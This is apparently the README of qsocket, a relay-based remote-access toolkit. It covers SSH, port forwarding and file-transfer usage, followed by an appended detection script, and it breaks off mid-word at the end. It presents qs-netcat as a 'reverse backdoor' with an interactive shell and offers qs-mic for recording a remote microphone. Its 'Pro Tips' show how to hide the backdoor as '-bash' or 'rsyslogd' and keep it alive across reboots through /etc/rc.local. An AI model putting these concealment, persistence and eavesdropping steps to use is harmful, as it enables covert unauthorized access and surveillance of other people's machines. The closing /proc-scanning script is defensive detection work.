Qsocket
Quantum Socket Toolkit
The Quantum Socket Toolkit allows two systems behind NAT/firewall to establish a TCP/TLS connection with each other.
The qsocket library locally derives a universally unique identifier (UUID) and connects two devices through the Quantum Socket Relay Network (QSRN), independent of the network layers, local IP address, or geographical location. The entire qsocket project is ported from the original gsocket toolkit of THC.
But Why?
So why did you reinvent the wheel? Simply because we wanted our own wheel :) Due to several design choices of THC and the nature of the project we were not comfortable using the GSRN for our own business. So we decided to create our own version to our own liking. We also wanted to modernize the project by porting it to Go/Rust, add new features, more platform support, and scalability.
The Quantum Socket Toolkit comes with a set of tools:
- qs-netcat - Netcat on steroids. Turn netcat into a TLS encrypted reverse backdoor via TOR (optional) with a true PTY/interactive command shell (qs-netcat -s MySecret -i), integrated file-transfer, redirect traffic or give somebody temporary shell access.
- qs-mic - Access (record audio) the microphone devices of a remote system. (qs-mic -s MySecret -d 10)
- qs-proxy - Redirects the traffic of an existing program (binary) over the QSRN. It does so by hooking fundamental socket libraries inside libc using the LD_PRELOAD method. (Experimental)
- ...many more examples and tools.
- qs-lite - Lightweight version of the qs-netcat utility written in pure Rust (no external dependency).
Installation
| Tool | Build From Source | Binary Release |
| :-----------: | :----------------------------------------------------------: | :-------------------------------------------------------: |
| qs-netcat | go install github.com/qsocket/qs-netcat@master | Download |
| qs-mic | cargo install --git https://github.com/qsocket/qs-mic | Download |
| qs-lite | cargo install --git https://github.com/qsocket/qs-lite | Download |
| qs-proxy | make && make install | Download |
Docker Install
docker pull qsocket/qs-netcat
docker run -it qsocket/qs-netcat -h
Supported Platforms
The Qsocket toolkit supports 12 platforms on 11 architectures; see the table below for details.
| Tool | Linux | Windows | Darwin | FreeBSD | OpenBSD | NetBSD | Android | IOS | Solaris | Illumos | Dragonfly | AIX |
| :-----------: | :-------: | :---------: | ---------- | ----------- | ----------- | ---------- | ----------- | ------- | ----------- | ----------- | ------------- | ------- |
| qs-netcat | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| qs-lite | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| qs-mic | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ | ❌ |
| qs-proxy | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ | ❌ |
| ~qs-cam~ | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
Examples
https://user-images.githubusercontent.com/17179401/224060762-e0f121f6-431b-4eb5-8833-4a5d533003de.mp4
RDP connection over QSRN: https://user-images.githubusercontent.com/17179401/213314447-65ecaf43-89fd-48bd-a242-3345f6baf185.mov
ADB access over QSRN: https://user-images.githubusercontent.com/17179401/216651601-6ddc8ddf-7248-4c2b-bd77-00f00f773c80.mov
Usage:
- SSH from Workstation B to Workstation A through any firewall/NAT
$ qs-netcat -f "localhost:22" -l # Workstation A
$ qs-proxy ssh root@qsocket # Workstation B
- Log in to Workstation A from Workstation B through any firewall/NAT
$ qs-netcat -l -i # Workstation A
$ qs-netcat -i # Workstation B
- Transfer files from Workstation B to Workstation A
$ qs-netcat -q -s MySecret -l > file.txt # Workstation A
$ qs-netcat -q -s MySecret < file.txt # Workstation B
- Port forward. Access 192.168.6.7:22 on Workstation A's private LAN from Workstation B:
$ qs-netcat -l -f 192.168.6.7:22 # Workstation A
$ qs-netcat -f :2222 # Workstation B
- In a new terminal on Workstation B execute:
ssh -p 2222 root@127.0.0.1 # Will ssh to 192.168.6.7:22 on Workstation A's private LAN
- Execute any command (nc -e style) on Workstation A
$ qs-netcat -l -e "echo hello world; id; exit" # Workstation A
$ qs-netcat # Workstation B
Another example: Spawn a new docker environment deep inside a private network
# Start this on a host deep inside a private network
qs-netcat -il -e "docker run --rm -it kalilinux/kali-rolling"
Access the docker environment deep inside the private network from anywhere in the world:
qs-netcat -i
Listen in on a remote computer microphone for 10 seconds
$ qs-mic -l -s MySecret # Workstation A
$ qs-mic -d 10 -s MySecret --play # Workstation B
Access the entirety of Workstation A's private LAN (SOCKS4/4a/5 proxy)
$ qs-netcat -l -f :22 -s MySecret # Workstation A
$ ssh -D 9090 -o ProxyCommand='qs-netcat -s MySecret' root@doesnotmatter # Workstation B
Access www.google.com via Workstation A's private LAN from your Workstation B:
$ curl --socks4a 127.1:9090 http://www.google.com
Mount a remote folder using sshfs and qs-netcat
$ qs-netcat -l -f :22 -s MySecret # Workstation A
$ qs-netcat -f :9090 -s MySecret # Workstation B
$ sudo sshfs -o allow_other,default_permissions -p 9090 root@localhost:/remote_dir /mnt/local_dir # Workstation B
Pro Tips
- Hide your arguments (argv)
Pass the arguments by environment variable (QS_ARGS) and use a bash-trick to hide qs-netcat binary in the process list:
$ export QS_ARGS="-s MySecret -l -i -q"
$ exec -a -bash ./qs-netcat & # Hide as '-bash'.
$ ps alxww | grep qs-netcat
$ ps alxww | grep -bash
1001 47255 1 0 26 5 4281168 436 - SNs ?? 0:00.00 -bash
- SSH login to remote workstation
# On the remote workstation execute:
qs-netcat -s MySecret -l -f 192.168.6.7:22
or
# Access 192.168.6.7 via ssh on the remote network from your workstation:
ssh -o ProxyCommand='qs-netcat -q -s MySecret' root@doesnotmatter
- Retain access after reboot
The easiest way to retain access to a remote system is by using the automated deploy script. Alternatively the following can be used to achieve the same: Combine what you have learned so far and make your backdoor restart after reboot (and as a hidden service obfuscated as rsyslogd). Use any of the start-up scripts, such as /etc/rc.local:
$ cat /etc/rc.local
#! /bin/sh -e
QS_ARGS="-s MySecret -l -i -q" HOME=/root TERM=xterm-256color SHELL="/bin/bash" /bin/bash -c "cd $HOME; exec -a rsyslogd /usr/local/bin/qs-netcat"
exit 0
Not all environment variables are set during system bootup. Set some variables to make the backdoor more enjoyable: TERM=xterm-256color and SHELL=/bin/bash and HOME=/root. The startup script (/etc/rc.local) uses /bin/sh which does not support our exec -a trick. Thus we use /bin/sh to start /bin/bash which in turn does the exec -a trick and starts qs-netcat. Puh. The qs-netcat process is hidden (as rsyslogd) from the process list. Read how to enable rc.local if /etc/rc.local does not exist.
Alternatively install qs-netcat as a systemd service.
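The two hiding tricks above (exec -a and QS_ARGS) leave traces under /proc that a defender can check. The following is an added example, not code from the qsocket project: it compares each process's argv[0] with the binary behind /proc/<pid>/exe and looks for QS_ARGS in the process environment. The function names and the sample /proc tree are hypothetical and constructed for illustration.

```shell
#!/bin/sh
# Added example, not qsocket project code. Flags processes whose argv[0]
# differs from the binary behind /proc/<pid>/exe, or whose environment
# carries QS_ARGS. Function names and the sample tree are hypothetical.

check_pid() (   # check_pid <proc_root> <pid>; subshell body keeps vars local
    dir=$1/$2
    exe=$(readlink "$dir/exe" 2>/dev/null) || exit 0   # kernel thread or no access
    exe=${exe% (deleted)}                              # binary unlinked after start
    [ -r "$dir/cmdline" ] || exit 0
    # argv[0] is the first NUL-terminated field of cmdline
    argv0=$(tr '\000' '\n' < "$dir/cmdline" | head -n 1)
    [ -n "$argv0" ] || exit 0
    name=${argv0##*/}; name=${name#-}   # login shells legitimately run as "-bash"
    reasons=
    [ "$name" = "${exe##*/}" ] || reasons=argv0-mismatch
    if [ -r "$dir/environ" ] &&
       tr '\000' '\n' < "$dir/environ" | grep -q '^QS_ARGS='; then
        reasons=${reasons:+$reasons,}qs-args-env
    fi
    [ -z "$reasons" ] ||
        printf 'pid=%s exe=%s argv0=%s reasons=%s\n' "$2" "$exe" "$argv0" "$reasons"
)

scan_proc() {   # scan_proc [proc_root]; one output line per flagged process
    for d in "${1:-/proc}"/[0-9]*; do
        if [ -d "$d" ]; then check_pid "${1:-/proc}" "${d##*/}"; fi
    done
    return 0
}

# Constructed sample: a fake /proc tree with three processes.
build_sample_tree() {
    t=$(mktemp -d)
    mkdir "$t/101" "$t/202" "$t/303"
    ln -s /usr/sbin/sshd "$t/101/exe"             # honest daemon
    printf '%s\000' /usr/sbin/sshd -D > "$t/101/cmdline"
    printf '%s\000' PATH=/usr/bin > "$t/101/environ"
    ln -s /usr/local/bin/qs-netcat "$t/202/exe"   # as started from rc.local above
    printf '%s\000' rsyslogd > "$t/202/cmdline"
    printf '%s\000' HOME=/root 'QS_ARGS=-s MySecret -l -i -q' > "$t/202/environ"
    ln -s /bin/bash "$t/303/exe"                  # ordinary login shell
    printf '%s\000' -bash > "$t/303/cmdline"
    printf '%s\000' HOME=/home/u > "$t/303/environ"
    echo "$t"
}

# Demo on the constructed tree; on a live host run `scan_proc /proc` as root.
demo=$(build_sample_tree); scan_proc "$demo"; rm -rf "$demo"
```

Symlinked binaries and daemons that rewrite their process title also produce argv0-mismatch lines, so treat each hit as a triage lead. Reading the exe link and environ of other users' processes requires root.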
Alter
